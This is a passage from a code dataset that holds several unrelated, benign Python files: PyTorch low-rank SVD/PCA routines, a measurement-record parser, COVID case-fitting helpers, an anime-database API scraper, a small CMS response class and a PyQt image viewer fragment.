:math:`A \\approx U diag(S) V^T`. In case :math:`M` is given, then\n SVD is computed for the matrix :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 5.1 from\n Halko et al, 2009.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n .. note:: The input is assumed to be a low-rank matrix.\n\n .. note:: In general, use the full-rank SVD implementation\n ``torch.svd`` for dense matrices due to its 10-fold\n higher performance characteristics. The low-rank SVD\n will be useful for huge sparse matrices that\n ``torch.svd`` cannot handle.\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of A.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n if not torch.jit.is_scripting():\n tensor_ops = (A, M)\n if (not set(map(type, tensor_ops)).issubset((torch.Tensor, type(None))) and has_torch_function(tensor_ops)):\n return handle_torch_function(svd_lowrank, tensor_ops, A, q=q, niter=niter, M=M)\n return _svd_lowrank(A, q=q, niter=niter, M=M)\n\n\ndef _svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n q = 6 if q is None else q\n m, n = A.shape[-2:]\n matmul = _utils.matmul\n if M is None:\n M_t = None\n else:\n M_t = _utils.transpose(M)\n A_t = _utils.transpose(A)\n\n # Algorithm 5.1 in Halko et al 2009, slightly modified to reduce\n # the number conjugate and transpose operations\n if m < n:\n # computing the SVD approximation of a transpose in order to\n # keep B shape minimal\n Q = get_approximate_basis(A_t, q, niter=niter, M=M_t)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B_t = matmul(A, Q_c)\n else:\n B_t = matmul(A, Q_c) - matmul(M, Q_c)\n U, S, V = torch.svd(B_t)\n V = Q.matmul(V)\n else:\n Q = 
get_approximate_basis(A, q, niter=niter, M=M)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B = matmul(A_t, Q_c)\n else:\n B = matmul(A_t, Q_c) - matmul(M_t, Q_c)\n U, S, V = torch.svd(_utils.transpose(B))\n U = Q.matmul(U)\n\n return U, S, V\n\n\ndef pca_lowrank(A, q=None, center=True, niter=2):\n # type: (Tensor, Optional[int], bool, int) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Performs linear Principal Component Analysis (PCA) on a low-rank\n matrix, batches of such matrices, or sparse matrix.\n\n This function returns a namedtuple ``(U, S, V)`` which is the\n nearly optimal approximation of a singular value decomposition of\n a centered matrix :math:`A` such that :math:`A = U diag(S) V^T`.\n\n .. note:: The relation of ``(U, S, V)`` to PCA is as follows:\n\n - :math:`A` is a data matrix with ``m`` samples and\n ``n`` features\n\n - the :math:`V` columns represent the principal directions\n\n - :math:`S ** 2 / (m - 1)` contains the eigenvalues of\n :math:`A^T A / (m - 1)` which is the covariance of\n ``A`` when ``center=True`` is provided.\n\n - ``matmul(A, V[:, :k])`` projects data to the first k\n principal components\n\n .. note:: Different from the standard SVD, the size of returned\n matrices depend on the specified rank and q\n values as follows:\n\n - :math:`U` is m x q matrix\n\n - :math:`S` is q-vector\n\n - :math:`V` is n x q matrix\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments:\n\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of\n :math:`A`. By default, ``q = min(6, m,\n n)``.\n\n center (bool, optional): if True, center the input tensor,\n otherwise, assume that the input is\n centered.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2.\n\n References::\n\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n\n if not torch.jit.is_scripting():\n if type(A) is not torch.Tensor and has_torch_function((A,)):\n return handle_torch_function(pca_lowrank, (A,), A, q=q, center=center, niter=niter)\n\n (m, n) = A.shape[-2:]\n\n if q is None:\n q = min(6, m, n)\n elif not (q >= 0 and q <= min(m, n)):\n raise ValueError('q(={}) must be non-negative integer'\n ' and not greater than min(m, n)={}'\n .format(q, min(m, n)))\n if not (niter >= 0):\n raise ValueError('niter(={}) must be non-negative integer'\n .format(niter))\n\n dtype = _utils.get_floating_dtype(A)\n\n if not center:\n return _svd_lowrank(A, q, niter=niter, M=None)\n\n if _utils.is_sparse(A):\n if len(A.shape) != 2:\n raise ValueError('pca_lowrank input is expected to be 2-dimensional tensor')\n c = torch.sparse.sum(A, dim=(-2,)) / m\n # reshape c\n column_indices = c.indices()[0]\n indices = torch.zeros(2, len(column_indices),\n dtype=column_indices.dtype,\n device=column_indices.device)\n indices[0] = column_indices\n C_t = torch.sparse_coo_tensor(\n indices, c.values(), (n, 1), dtype=dtype, device=A.device)\n\n ones_m1_t = torch.ones(A.shape[:-2] + (1, m), dtype=dtype, device=A.device)\n M = _utils.transpose(torch.sparse.mm(C_t, ones_m1_t))\n return _svd_lowrank(A, q, niter=niter, M=M)\n else:\n c = A.sum(dim=(-2,)) / m\n C = c.reshape(A.shape[:-2] + (1, n))\n ones_m1 = torch.ones(A.shape[:-1] + (1, ), 
dtype=dtype, device=A.device)\n M = ones_m1.matmul(C)\n return _svd_lowrank(A - M, q, niter=niter, M=None)\n","sub_path":"torch/_lowrank.py","file_name":"_lowrank.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385738780","text":"import re\nfrom itertools import islice\n\nimport pandas as pd\n\nfrom . import helpers\n\nclass Record():\n def __init__(self, string):\n self.__dim= 0\n self.__size = 0\n self.__schema = None\n self.__data = {}\n\n string = string[9:-1] # Trim '(Record ...)'\n self.parse_input_string(string)\n\n def __str__(self):\n return \"\"\"Record:\n dim: {}\n size: {}\n schema: {}\n data: {}\n \"\"\".format(self.dim, self.size, self.schema, self.data)\n\n @property\n def dim(self):\n return self.__dim\n\n @property\n def size(self):\n return self.__dim\n\n @property\n def schema(self):\n return self.__schema\n\n @property\n def data(self):\n return self.__data\n\n def clean_freq_data(self):\n # In the files used as reference when creating this every record\n # contained a list of all the frequency points. This is nonsense\n if \"Freq\" not in self.__data:\n raise KeyError(\"Data does not contain frequency field\")\n\n self.data[\"Freq\"] = self.data[\"Freq\"][0]\n\n def parse_input_string(self, string):\n data_re = re.compile(r'\\(data[\\s\\S]+\\)')\n matches = re.search(data_re, string)\n if data_re:\n data = matches.group(0)\n data = data[4:-1] # strip \"(data ...)\"\n string = re.sub(data_re, '', string)\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n \n if keyword == 'schema':\n self.__schema = Schema(string[i:end+1])\n for key in self.schema.fields.keys():\n self.__data[key] = []\n skip = end-i\n next(islice(it, skip, skip), None)\n\n elif keyword == 'numDims':\n self.__dim = statement[1]\n \n elif keyword == 'size':\n self.__size = statement[1]\n\n else:\n raise KeyError('Unexpected keyword: {}'.format(statement[0]))\n\n record_locs = [x.start() for x in re.finditer('\\((record)', data)]\n records = []\n for i, _ in enumerate(record_locs):\n if i == len(record_locs)-1:\n records.append(data[record_locs[-1]:-2])\n else:\n records.append(data[record_locs[i]:record_locs[i+1]-2])\n\n for record in records:\n record_dict = self.parse_record(record)\n\n def parse_record(self, record):\n record = record[7:-1] # strip \"(record ...)\"\n fields = re.findall('\\(([^)]+)', record)\n for field in fields:\n field_name = re.search('\\\"\\w+\\\"', field).group(0).strip('\"')\n list_search = re.search('\\[.*\\]', field) \n number_search = re.search('-?\\d+\\.?\\d*', field)\n\n # This converts the freqs to floats which is okay but maybe not ideal\n if list_search:\n field_val = list_search.group(0)\n field_val = re.sub('[\\[\\]]', '', field_val).strip()\n field_val = [float(x) for x in field_val.split()]\n elif number_search:\n field_val = number_search.group(0)\n field_val = float(field_val)\n\n self.__data[field_name].append(field_val)\n \n def to_dataframes(self):\n proper_keys = (\"Mag\", \"Phase\", \"Vpos\", \"Hpos\", \"HV\", \"Freq\")\n if not all(k in self.data.keys() for k in proper_keys):\n raise KeyError(\"Record does not contain the correct keys: {}\".format(self.data.keys()))\n \n pos = list(zip(self.data[\"Vpos\"], self.data[\"Hpos\"]))\n dataframes = {}\n for i, freq in enumerate(self.data[\"Freq\"]):\n mags = 
[mag[i] for mag in self.data[\"Mag\"]]\n phases = [phase[i] for phase in self.data[\"Phase\"]]\n df = pd.DataFrame({'Position': pos, 'Mag': mags, 'Phase': phases})\n dataframes['{}'.format(freq)] = df\n\n return dataframes\n\n\n\nclass Schema():\n def __init__(self, string):\n self.__numFields = 0\n self.__fields = {}\n\n string = string[7:-1] # strip \"(schema ...)\"\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n\n if keyword == 'numFields':\n self.__numFields = statement[1]\n\n elif keyword == 'fieldName':\n self.new_field(string[i:end+1])\n skip = end-i\n next(islice(it, skip, skip), None)\n\n else:\n raise NotImplementedError('{} is not yet implemented\\n\\tFull statement: {}'.format(keyword, statement))\n\n def __str__(self):\n return \"\"\"\n numFields: {}\n fields: {}\n \"\"\".format(self.__numFields, self.__fields)\n\n @property\n def fields(self):\n return self.__fields\n\n @property\n def numFields(self):\n return self.__numFields\n\n def new_field(self, string):\n string = string[10:-1]\n fields = [s.strip().split() for s in re.split(r'[()]', string) if not s.isspace()]\n fieldname = fields[0][0].strip('\"')\n fields = fields[1:]\n temp = {}\n for field in fields:\n temp[field[0]] = field[1]\n\n self.__fields[fieldname] = temp\n\n\n\n \n","sub_path":"chamberplot/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521081280","text":"import pandas as pd\nimport numpy as np\nfrom lmfit.models import StepModel\nimport os.path\n\ncases = 'https://covid.ourworldindata.org/data/ecdc/total_cases.csv'\ndeaths = 'https://covid.ourworldindata.org/data/ecdc/total_deaths.csv'\nUS_cases = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\"\nUS_deaths = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n\n\ndef state(s):\n return f'http://covidtracking.com/api/v1/states/{s}/daily.csv'\n\n\ndef date_to_int(s: str):\n padded = [x.zfill(2) for x in s.split('/')]\n return int(''.join([padded[i] for i in [2, 0, 1]]))\n\n\ndef date_to_str(d):\n s = str(d)\n s = [s[i:i + 2] for i in range(0, len(s), 2)]\n s[0] = \"20\" + s[0]\n return '-'.join(s)\n\n\ndata = dict()\ndata2 = dict()\n\npreds = dict()\n\nstate_data = dict()\n\nUS_data = dict()\nUS_data2 = dict()\n\npopulation_state = dict()\npopulation_county = dict()\n\n\ndef get_data(date):\n if date in data:\n return data[date]\n elif os.path.isfile(f\"assets/cases/df_{date}.csv\"):\n df = pd.read_csv(f\"assets/cases/df_{date}.csv\")\n data[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(cases)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/cases/df_{len(df.index) - 1}.csv\")\n data[len(df.index) - 1] = df\n return df\n\n\ndef get_data2(date):\n if date in data2:\n return data2[date]\n elif os.path.isfile(f\"assets/deaths/df2_{date}.csv\"):\n df = pd.read_csv(f\"assets/deaths/df2_{date}.csv\")\n data2[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(deaths)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n 
df.to_csv(f\"assets/deaths/df2_{len(df.index) - 1}.csv\")\n data2[len(df.index) - 1] = df\n return df\n\n\ndef get_us_data(date):\n if date in US_data:\n df = US_data[date]\n return df\n elif os.path.isfile(f\"assets/john_hopkins/cases_{date}.csv\"):\n df = pd.read_csv(f\"assets/john_hopkins/cases_{date}.csv\", index_col=0)\n US_data[date] = df\n return df\n else:\n print(\"Getting data...\")\n df = pd.read_csv(US_cases)\n df.columns.values[11:] = df.columns[11:].map(date_to_int).values\n df = df.T[np.concatenate([np.array([True] * 11), df.T.index[11:] <= date])].T\n US_data[df.columns[-1]] = df\n df.to_csv(f\"assets/john_hopkins/cases_{df.columns[-1]}.csv\")\n return df\n\n\ndef get_us_data2(date):\n if date in US_data2:\n df2 = US_data2[date]\n return df2\n elif os.path.isfile(f\"assets/john_hopkins/deaths_{date}.csv\"):\n df2 = pd.read_csv(f\"assets/john_hopkins/deaths_{date}.csv\", index_col=0)\n US_data2[date] = df2\n return df2\n else:\n print(\"Getting data...\")\n df2 = pd.read_csv(US_deaths)\n df2.columns.values[12:] = df2.columns[12:].map(date_to_int).values\n df2 = df2.T[np.concatenate([np.array([True] * 12), df2.T.index[12:] <= date])].T\n US_data2[df2.columns[-1]] = df2\n df2.to_csv(f\"assets/john_hopkins/deaths_{df2.columns[-1]}.csv\")\n return df2\n\n\ndef get_state_data2(s: str, date: int):\n s = s.upper()\n if (s, date) in state_data:\n return state_data[(s, date)]\n elif os.path.isfile(f\"assets/state/df_{s}_{date}.csv\"):\n df = pd.read_csv(f\"assets/state/df_{s}_{date}.csv\", index_col=0)\n state_data[(s, date)] = df\n else:\n print('Getting File...')\n df = pd.read_csv(state(s))\n df = df[df['date'] >= 20200304]\n df = df[df['date'] <= date]\n df = pd.DataFrame(df.values[::-1], range(len(df.index)), df.columns)\n df = df.fillna(0)\n df.to_csv(f\"assets/state/df_{s}_{df['date'].iloc[-1]}.csv\")\n state_data[(state, date)] = df\n return df\n\n\ndef get_state_data(s: str, date: int):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[df['Province_State'] == s].sum(), df2[df2['Province_State'] == s].sum()],\n axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_state[s] = tmp.iloc[-1, 1]\n return tmp.iloc[11:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_state_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_state_model(s, date, tp):\n df = get_state_data(s, date)\n fit = get_state_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_state_options(date):\n global population_state\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = df.groupby('Province_State').sum()\n tmp = tmp.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False) > 100\n states = tmp2.loc[tmp2].index.values\n min_dates = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n population_state = {**population_state, **df2.groupby('Province_State')['Population'].sum().to_dict()}\n return states, min_dates, population_state\n\n\ndef get_county_data(s, county, date):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[(df['Province_State'] == s) & (df['Admin2'] == county)].iloc[0, 11:],\n df2[(df2['Province_State'] == s) & (df2['Admin2'] == county)].iloc[0, 11:]], axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_county[', '.join([county, s])] 
= tmp.iloc[-1, 1]\n return tmp.iloc[:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_county_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_county_model(s, county, date, tp):\n df = get_county_data(s, county, date)\n fit = get_county_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_county_options(date):\n global population_county\n df = get_us_data(date).iloc[:, 5:]\n df2 = get_us_data2(date)\n tmp = df.groupby(['Province_State', 'Admin2']).sum()#.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False).gt(100)\n tmp2 = np.array([*tmp2.loc[tmp2].index.values])\n counties = dict()\n for s in np.unique(tmp2[:, 0]):\n counties[s] = tmp2[tmp2[:, 0] == s][:, 1].tolist()\n states = list(counties.keys())\n tmp2 = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n min_dates = dict()\n for s, c in tmp2.index:\n if s not in min_dates:\n min_dates[s] = {}\n min_dates[s][c] = tmp2.loc[(s, c)]\n tmp = df2.groupby(['Province_State', 'Admin2'])['Population'].sum()\n population_county = {s: tmp.xs(s).to_dict() for s in np.unique(np.array([*tmp.index.values])[:, 0])}\n return states, counties, min_dates, population_county\n\n\ndef get_fit(df, country):\n x, y = df[df[country] > 0][country].index.values, df[df[country] > 0][country].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n # Give no weight\n # fit = mod.fit(y, pars, x=x)\n\n # Give weight to highest points\n # fit = mod.fit(y, pars, x=x, weights=(1 / (y + 1e-3))[::-1])\n\n # Or give weight to newest points\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n\n # Or give weight to least and highest points using sech\n # y_max = y.max()\n # coe = 10 / y_max\n # fit = mod.fit(y, pars, x=x, weights=(1 - 1/np.cosh(coe*(y - y_max / 2))))\n\n # Or give weight to least and highest points using polynomial\n # y_max = y.max()\n # fit = mod.fit(y, pars, x=x, weights=pow(y - y_max / 2, 4) / pow(y_max / 2, 4))\n return fit\n\n\ndef get_model(country, date):\n df = get_data(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_death_model(country, date):\n df = get_data2(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef find_end_day(fit, percent):\n goal = int(fit.params['amplitude'].value) * percent\n i = 0\n while True:\n if fit.eval(x=i) >= goal:\n return i\n i += 1\n\n\ndef get_prediction(country, date):\n print(date)\n if date in preds:\n return preds[date][country]\n elif os.path.isfile(f\"assets/nn/preds_nn_{date}.csv\"):\n df = pd.read_csv(f\"assets/nn/preds_nn_{date}.csv\", index_col=0)\n preds[date] = df\n return df[country]\n else:\n print(\"File not created...\")\n # pred = make_prediction(df, df.index[-1] + 50)\n # return pred\n return None\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
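+# Note: the data.py record above projects totals by fitting lmfit's logistic
+# StepModel to cumulative counts, weighting the newest points most heavily.
+# A minimal runnable sketch of that fitting pattern follows; the synthetic
+# curve and the printed parameter are illustrative assumptions, not values
+# taken from the record.
+import numpy as np
+from lmfit.models import StepModel
+
+x = np.arange(60.0)
+y = 10000.0 / (1.0 + np.exp(-(x - 30.0) / 5.0))  # synthetic cumulative curve
+
+mod = StepModel(form='logistic')
+pars = mod.guess(y, x=x)
+# Reversed 1/x weights emphasise the most recent observations, as in the record.
+fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])
+print(int(fit.params['amplitude'].value))  # fitted plateau, roughly 10000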
+{"seq_id":"154744982","text":"import time\n\n#打印当前时分秒\ndef test_time():\n\tmyTime = time.strftime('%Y%m%d%H%M%S')\n\tmyTime1 = int(time.time()*10000)\n\t#time.time 输出的是时间戳\n\tprint(myTime)\n\tprint(myTime1)\n\n\n\n\nif __name__ == '__main__':\n\ttest_time()","sub_path":"python/work/useful.py","file_name":"useful.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"294668749","text":"\nimport requests\nimport pandas as pd\nimport time\nimport logging\nfrom argparse import ArgumentParser\n\n\ndef get_range():\n parser = ArgumentParser()\n parser.add_argument('-r', '--range', type=int, dest='range',\n help=\"range\", metavar=\"Range\")\n\n args = parser.parse_args()\n\n if (args.range):\n return(args.range)\n\n return 1\n\n\ndef get_person(id):\n apiUrl = f'{base_url}/person/{i}'\n\n person = {}\n response = object()\n\n try:\n response = requests.get(apiUrl)\n response.raise_for_status()\n except requests.exceptions.Timeout:\n tries = 0\n while tries < 5 and response.status_code != 200:\n tries += 1\n response = requests.get(apiUrl)\n except requests.exceptions.ConnectionError as e:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Connection error: ' + e.strerror)\n except requests.exceptions.HTTPError as e:\n if (e.response.status_code):\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Person id=' + str(i) + ' does not exist')\n else:\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Error while retrieving ' + str(i) + ' with status code ' + str(response.status_code))\n else:\n jsonResult = response.json()\n\n person['id'] = str(jsonResult['mal_id'])\n person['name'] = jsonResult['name']\n person['given_name'] = jsonResult['given_name']\n person['family_name'] = jsonResult['family_name']\n person['alternate_names'] = jsonResult['alternate_names']\n person['birthday'] = jsonResult['birthday']\n person['member_favorites'] = str(jsonResult['member_favorites'])\n person['about'] = jsonResult['about']\n person['voice_acting_roles'] = [{'role': x['role'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name'],\n 'character_id': str(x['character']['mal_id']),\n 'character_name': x['character']['name']}\n for x in jsonResult['voice_acting_roles']]\n person['anime_staff_positions'] = [{'position': x['position'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name']}\n for x in jsonResult['anime_staff_positions']]\n person['published_manga'] = [{'position': x['position'],\n 'manga_id': str(x['manga']['mal_id']),\n 'manga_name': x['manga']['name']}\n for x in jsonResult['published_manga']]\n person['timestamp'] = time.strftime(\n '%Y-%m-%dT%H:%M:%SZ', time.gmtime())\n\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Successfully retrieved: ' + jsonResult['name'] + ' id=' + str(id))\n\n return person\n\n\ndef save_to_csv(animes):\n try:\n df = pd.json_normalize(animes)\n df.to_csv(master, mode='a',\n index=False, header=False)\n except:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Error while saving person data')\n\n\nlogging.basicConfig(filename='../../mal_person_parser.log', level=logging.INFO)\n\nbase_url = 'https://api.jikan.moe/v3'\nup_to = get_range()\n\n# Get the starting point\nmaster = '../../dataset/person.csv'\nstart = 1\ntry:\n mDf = pd.read_csv(master)\n start = int(mDf.iloc[-1, 0]) + 1\n print(f'Retrieving {up_to} items 
starting from {str(start)}')\nexcept pd.io.common.EmptyDataError:\n print('Person dataset is empty!')\n start = 1\nexcept IndexError:\n print('Person dataset is empty!')\n start = 1\n\npersons = []\n\ncount = 0\n\nfor i in range(start, start + up_to):\n person = get_person(i)\n if (person):\n persons.append(person)\n count = count+1\n\n time.sleep(5)\n\n if(count % 10 == 0 and count != 0):\n save_to_csv(persons)\n persons = []\n\nsave_to_csv(persons)\n","sub_path":"src/mal-scraper/getPersons.py","file_name":"getPersons.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496717323","text":"class CMSResponse:\n\n def __init__(self, request, response):\n self.request = request\n self.response = response\n\n def html(self, content, status='200 OK'):\n return self.output(\n content,\n status\n )\n\n def js(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/javascript'\n )\n\n def css(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/css'\n )\n\n def json(self, content):\n return self.output(\n content,\n '200 OK',\n 'application/json'\n )\n\n def jpg(self, filename):\n with open(filename, 'rb') as f:\n content = f.read()\n self.response('200 OK', [\n (\"Content-Type\", 'image/jpg'),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n\n def sendHTML(self, html, status='200 OK', meta={}):\n import os\n import json\n\n if self.request.get('domain_exists') and self.request.get('setting_exists'):\n with open(self.request.get('setting_json'), 'r') as f:\n setting = json.load(f)\n\n def CMS_Meta(options):\n return meta.get(options, '')\n\n def CMS_Setting(options):\n return setting.get(options, '')\n\n page_render = html\n template_path = self.request.get('theme_dir')\n if not os.path.exists(os.path.join(template_path, html)):\n from .CMSConfig import config\n template_path = config.dir_default\n\n if not os.path.exists(os.path.join(template_path, html)):\n html = '404Theme.html'\n\n from jinja2 import Environment, FileSystemLoader, select_autoescape\n jinja = Environment(\n loader=FileSystemLoader(\n template_path\n ),\n autoescape=select_autoescape(['html', 'xml']),\n enable_async=True,\n block_start_string='',\n block_end_string='',\n variable_start_string='',\n variable_end_string='',\n comment_start_string='',\n comment_end_string=''\n )\n content = jinja.get_template(html)\n content = content.render(\n CMS_Meta=CMS_Meta,\n CMS_Setting=CMS_Setting,\n page_render=page_render\n )\n return self.html(content, status)\n\n def show404(self):\n return self.sendHTML('404.html', '404 Not Found')\n\n def output(self, content, status='200 OK', type=\"text/html\"):\n content = bytes(content, encoding='utf-8') if content else b\"\\n\"\n self.response(status, [\n (\"Content-Type\", type),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n","sub_path":"cmscore/CMSResponse.py","file_name":"CMSResponse.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383907088","text":"from PyQt5 import Qt\nfrom PyQt5 import QtCore,QtWidgets,QtGui\nimport sys\nimport PyQt5\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QFileDialog, QGraphicsRectItem, QGraphicsScene\nfrom PyQt5.QtGui import QPixmap, QImage\nfrom PyQt5.QtCore import QSize\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport imgui as window\nimport 
window2\n\n\nclass MainWindow():\n def __init__(self):\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n self.raw_image = None\n self.ui = window.Ui_MainWindow()\n self.ui.setupUi(MainWindow)\n self.action_connect()\n MainWindow.show()\n self.graph_sence = CARscene()\n sys.exit(app.exec_())\n\n\n# 信号槽绑定\n def action_connect(self):\n self.ui.action.triggered.connect(self.open_file)\n # self.ui.action_2.triggered.connect(self.save_file)\n # self.ui.action_5.triggered.connect(self.recover_img)\n #\n # # 打开摄像头\n # self.ui.action_17.triggered.connect(self.new_camera)\n #\n # # 标记人脸位置\n # self.ui.action_18.triggered.connect(self.mark_face)\n\n# 显示图片\n def show_image(self):\n img_cv = cv2.cvtColor(self.current_img, cv2.COLOR_RGB2BGR)\n img_width, img_height, a = img_cv.shape\n ratio_img = img_width/img_height\n ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n if ratio_img > ratio_scene:\n width = int(self.ui.graphicsView.width())\n height = int(self.ui.graphicsView.width() / ratio_img)\n else:\n width = int(self.ui.graphicsView.height() * ratio_img)\n height = int(self.ui.graphicsView.height())\n img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n h, w, c = img_resize.shape\n bytesPerLine = w * 3\n qimg = QImage(img_resize.data, w, h, bytesPerLine, QImage.Format_RGB888)\n self.scene = QGraphicsScene()\n pix = QPixmap(qimg)\n self.scene.addPixmap(pix)\n self.ui.graphicsView.setScene(self.scene)\n\n# # 显示灰度图像\n# def show_grayimage(self):\n# img_cv = self.gray_image\n# img_width, img_height = img_cv.shape\n# ratio_img = img_width/img_height\n# ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n# if ratio_img > ratio_scene:\n# width = int(self.ui.graphicsView.width())\n# height = int(self.ui.graphicsView.width() / ratio_img)\n# else:\n# width = int(self.ui.graphicsView.height() * ratio_img)\n# height = int(self.ui.graphicsView.height())\n# img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n# h, w = img_resize.shape\n# qimg = QImage(img_resize.data, w, h, w, QImage.Format_Grayscale8)\n# self.scene = QGraphicsScene()\n# pix = QPixmap(qimg)\n# self.scene.addPixmap(pix)\n# self.ui.graphicsView.setScene(self.scene)\n\n#\n# # 显示直方图\n# def show_histogram(self):\n# if self.raw_image is None:\n# return 0\n# img = self.current_img\n# plt.figure(figsize=((self.ui.tab_3.width()-10)/100, (self.ui.tab_3.width()-60)/100), frameon=False)\n# plt.hist(img.ravel(), bins=256, range=[0, 256])\n# plt.axes().get_yaxis().set_visible(False)\n# # plt.axes().get_xaxis().set_visible(False)\n# ax = plt.axes()\n# # 隐藏坐标系的外围框线\n# for spine in ax.spines.values():\n# spine.set_visible(False)\n# 